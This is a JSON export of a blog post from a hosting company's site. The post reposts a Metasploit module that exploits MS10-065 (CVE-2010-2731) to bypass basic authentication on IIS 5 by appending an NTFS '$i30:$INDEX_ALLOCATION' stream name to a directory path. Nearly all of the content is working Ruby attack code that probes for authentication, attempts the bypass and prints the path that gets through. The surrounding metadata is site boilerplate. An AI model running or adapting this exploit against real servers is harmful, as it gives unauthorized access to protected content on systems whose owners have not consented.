{"id":59307,"date":"2024-09-01T00:49:48","date_gmt":"2024-08-31T21:49:48","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180857\/iis_auth_bypass.rb.txt"},"modified":"2024-09-01T00:49:48","modified_gmt":"2024-08-31T21:49:48","slug":"ms10-065-microsoft-iis-5-ntfs-stream-authentication-bypass","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/ms10-065-microsoft-iis-5-ntfs-stream-authentication-bypass\/","title":{"rendered":"MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass"},"content":{"rendered":"<p>##<br \/># This module requires Metasploit: https:\/\/metasploit.com\/download<br \/># Current source: https:\/\/github.com\/rapid7\/metasploit-framework<br \/>##<\/p>\n<p>class MetasploitModule &lt; Msf::Auxiliary<br \/>include Msf::Exploit::Remote::HttpClient<\/p>\n<p>def initialize(info = {})<br \/>super(<br \/>update_info(<br \/>info,<br \/>&#8216;Name&#8217; =&gt; &#8216;MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass&#8217;,<br \/>&#8216;Description&#8217; =&gt; %q{<br \/>This module bypasses basic authentication for Internet Information Services (IIS).<br \/>By appending the NTFS stream name to the directory name in a request, it is<br \/>possible to bypass authentication.<br \/>},<br \/>&#8216;References&#8217; =&gt; [<br \/>[ &#8216;CVE&#8217;, &#8216;2010-2731&#8217; ],<br \/>[ &#8216;OSVDB&#8217;, &#8216;66160&#8217; ],<br \/>[ &#8216;MSB&#8217;, &#8216;MS10-065&#8217; ],<br \/>[ &#8216;URL&#8217;, &#8216;https:\/\/soroush.secproject.com\/blog\/2010\/07\/iis5-1-directory-authentication-bypass-by-using-i30index_allocation\/&#8217; ]],<br \/>&#8216;Author&#8217; =&gt; [<br \/>&#8216;Soroush Dalili&#8217;,<br \/>&#8216;sinn3r&#8217;<br \/>],<br \/>&#8216;License&#8217; =&gt; MSF_LICENSE,<br \/>&#8216;DisclosureDate&#8217; =&gt; &#8216;2010-07-02&#8217;<br \/>)<br \/>)<\/p>\n<p>register_options(<br \/>[<br \/>OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;The URI directory where basic auth is enabled&#8217;, &#8216;\/&#8217;])<br \/>])<br \/>end<\/p>\n<p>def has_auth<br \/>uri = normalize_uri(target_uri.path)<br \/>uri &lt;&lt; &#8216;\/&#8217; if uri[-1, 1] != &#8216;\/&#8217;<\/p>\n<p>res = send_request_cgi({<br \/>&#8216;uri&#8217; =&gt; uri,<br \/>&#8216;method&#8217; =&gt; &#8216;GET&#8217;<br \/>})<br \/>vprint_status(res.body) if res<\/p>\n<p>return (res and res.code == 401)<br \/>end<\/p>\n<p>def try_auth<br \/>uri = normalize_uri(target_uri.path)<br \/>uri &lt;&lt; &#8216;\/&#8217; if uri[-1, 1] != &#8216;\/&#8217;<br \/>uri &lt;&lt; Rex::Text.rand_text_alpha(rand(5..14)) + &#8220;.#{Rex::Text.rand_text_alpha(3)}&#8221;<\/p>\n<p>dir = File.dirname(uri) + &#8216;:$i30:$INDEX_ALLOCATION&#8217; + &#8216;\/&#8217;<\/p>\n<p>user = Rex::Text.rand_text_alpha(rand(5..14))<br \/>pass = Rex::Text.rand_text_alpha(rand(5..14))<\/p>\n<p>vprint_status(&#8220;Requesting: #{dir}&#8221;)<br \/>res = send_request_cgi({<br \/>&#8216;uri&#8217; =&gt; dir,<br \/>&#8216;method&#8217; =&gt; &#8216;GET&#8217;,<br \/>&#8216;authorization&#8217; =&gt; basic_auth(user, pass)<br \/>})<br \/>vprint_status(res.body) if res<\/p>\n<p>return (res &amp;&amp; (res.code != 401) &amp;&amp; (res.code != 404)) ? dir : &#8221;<br \/>end<\/p>\n<p>def run<br \/>if !has_auth<br \/>print_error(&#8216;No basic authentication enabled&#8217;)<br \/>return<br \/>end<\/p>\n<p>bypass_string = try_auth<\/p>\n<p>if bypass_string.empty?<br \/>print_error(&#8216;The bypass attempt did not work&#8217;)<br \/>else<br \/>print_good(&#8220;You can bypass auth by doing: #{bypass_string}&#8221;)<br \/>end<br \/>end<br \/>end<\/p>\n","protected":false},"excerpt":{"rendered":"<p>### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule &lt; Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClient def initialize(info = {})super(update_info(info,&#8216;Name&#8217; =&gt; &#8216;MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass&#8217;,&#8216;Description&#8217; =&gt; %q{This module bypasses basic authentication for Internet Information Services (IIS).By appending the NTFS stream name to the directory name in a request, it ispossible to bypass authentication.},&#8216;References&#8217; &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59307","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59307","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59307"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59307\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59307"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59307"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59307"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}